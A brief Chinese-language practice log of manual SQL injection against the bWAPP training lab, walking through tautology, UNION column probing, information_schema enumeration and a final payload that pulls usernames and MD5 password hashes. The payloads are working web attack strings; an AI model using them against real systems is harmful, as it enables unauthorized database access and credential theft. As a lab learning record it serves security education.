记录一次sql注入练习
在bwapp练习了一下手工注入,然后学习了B站教程,对sql数据库的结构有了更清晰的认识,对database
table
colunm
理解有了一定的加深,还学习了一些基础的数据库查询语句,以下记录一下手动注入(写报告的时候靶场好像关了)
injection的低等级漏洞,search(GET)的漏洞
-
输入
'or 1=1 #
得到所有回显 -
试了试 union 联合注入,得到报错好像是列数不匹配,然后试出来2,3,5,7有回显
' and 1=2 union select 1,2,3,4,5,6,7 #
-
用user() database()函数看了看信息,用户是root
' and 1=2 union select 1,user(),3,database(),6,7 #
-
从information_schema库中获取表名users
' and 1=2 union select 1,2,3,table_schema,6,7 from information_schema.tables #
-
获取列名login password
-
最后payload为
' and 1=2 union select 1,login,3,4,password,6,7 from users #
得到了用户名和md5加密的密码